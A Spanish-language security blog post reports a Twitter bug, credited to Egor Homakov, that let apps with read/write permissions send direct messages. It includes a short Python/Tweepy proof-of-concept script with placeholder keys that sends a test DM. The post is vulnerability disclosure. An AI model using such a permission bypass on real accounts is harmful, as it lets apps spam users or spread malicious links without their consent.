Vulnerabilidad en Twitter permite enviar mensajes directos sin permiso de los usuarios

El modelo de permisos de las aplicaciones de Twitter es bastante sencillo:


Es decir, si creamos una aplicación que tenga permisos sólo de lectura y escritura no debería acceder a los mensajes directos ¿verdad?

Pues no, Egor Homakov descubrió un bug en Twitter que permite a las aplicaciones enviar mensajes directos sin tener permisos específicos y sin que ni siquiera el usuario que tiene autorizada la aplicación se de cuenta.

Nosotros lo hemos comprobado mediante un cliente en Python con Tweepy. Fijaros que a priori esta aplicación no tiene permisos para enviar mensajes directos:



Pero sin embargo, si ejecutamos un script de prueba veremos el resultado confirmando la vulnerabilidad:

#!/usr/bin/env python

import sys
import tweepy

CONSUMER_KEY = 'xxxxxxxxxxxxxxxxxxxxx'
CONSUMER_SECRET = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'
ACCESS_KEY = 'xxxxxxxxx-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'
ACCESS_SECRET = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'

auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(ACCESS_KEY, ACCESS_SECRET)
api = tweepy.API(auth)

api.send_direct_message(screen_name= "hackplayers", text = "prueba")


Al parecer DaKnOb, otro investigador, comentó a Homakov que ya reportó a Twitter este supuesto bug, y que la compañía del pájaro le respondió alegando que era una característica de Twitter y que debería seguir como está... Pero ¿no es si no una oportunidad única para que las aplicaciones maliciosas puedan enviar spam y enlaces maliciosos?


Fuente:  Twitter vulnerability lets apps send DMs without user permission

Comentarios

Publicar un comentario